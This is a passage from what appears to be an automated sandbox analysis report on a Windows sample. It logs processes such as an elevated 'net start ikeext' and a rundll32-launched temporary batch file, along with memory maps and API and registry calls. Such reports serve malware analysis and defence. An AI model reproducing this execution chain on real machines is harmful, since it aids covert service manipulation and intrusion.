Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C24

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00156fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00270000	0x002d6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002e0000	0x002e0000	0x002e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002f0000	0x002f0000	0x002f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003a0000	0x003a0000	0x003affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003b0000	0x003b0000	0x00477fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000480000	0x00480000	0x00580fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000590000	0x00590000	0x0118ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001190000	0x01190000	0x012f2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01300000	0x015cefff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xc24

(Host: 54, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:36 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 81775	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\net.exe, os_pid = 0xc34, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #19: net.exe

Information	Value
ID	#19
File Name	c:\windows\system32\net.exe
Command Line	net start ikeext
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:27
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xc34
Parent PID	0xc20 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C38

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x000affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000000b0000	0x000b0000	0x000b3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000180000	0x00180000	0x0027ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000320000	0x00320000	0x0032ffff	Private Memory	Readable, Writable	Region Actions Download Dump
net.exe	0x00d20000	0x00d37fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
browcli.dll	0x6d0e0000	0x6d0ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x71dd0000	0x71de1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samcli.dll	0x734e0000	0x734eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wkscli.dll	0x73e70000	0x73e7efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x73e80000	0x73e88fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x740e0000	0x740e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x740f0000	0x7410bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x75290000	0x752a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x773e0000	0x773e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Process #20: net1.exe

(Host: 22, Network: 0)

Information	Value
ID	#20
File Name	c:\windows\system32\net1.exe
Command Line	C:\Windows\system32\net1 start ikeext
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:48, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:27

OS Process Information

Information	Value
PID	0xc3c
Parent PID	0xc34 (c:\windows\system32\net.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C40

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000130000	0x00130000	0x001affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory	Readable, Writable	Region Actions Download Dump
net1.exe	0x00410000	0x00439fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x00832fff	Pagefile Backed Memory	Readable	Region Actions
netmsg.dll	0x6d000000	0x6d001fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
browcli.dll	0x6d0e0000	0x6d0ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdsapi.dll	0x6fce0000	0x6fcf7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samcli.dll	0x734e0000	0x734eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samlib.dll	0x73a10000	0x73a21fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wkscli.dll	0x73e70000	0x73e7efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x73e80000	0x73e88fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netapi32.dll	0x73e90000	0x73ea0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dsrole.dll	0x741a0000	0x741a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
logoncli.dll	0x74cd0000	0x74cf1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x75290000	0x752a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76960000	0x76994fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x773e0000	0x773e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xc40

(Host: 22, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:36 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 81931	1	Fn
Module	Get Handle	module_name = c:\windows\system32\net1.exe, base_address = 0x410000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\net1.exe, file_name_orig = C:\Windows\system32\net1.exe, size = 260	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Service Name	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Display Name	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Module	Load	module_name = NETMSG, base_address = 0x6d000000	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 59	1	Fn Data
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 1	1	Fn Data
System	Sleep	duration = 2000 milliseconds (2.000 seconds)	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Service	Get Display Name	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 75	1	Fn Data
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data

Process #23: cmd.exe

(Host: 340, Network: 0)

Information	Value
ID	#23
File Name	c:\windows\system32\cmd.exe
Command Line	cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" "
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:51, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:24

OS Process Information

Information	Value
PID	0xcc4
Parent PID	0xae4 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CC8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0011ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0024ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000250000	0x00250000	0x00317fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000410000	0x00410000	0x0050ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000510000	0x00510000	0x00610fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000620000	0x00620000	0x0121ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001220000	0x01220000	0x01382fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01390000	0x0165efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xcc8

(Host: 285, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:38 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 84162	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
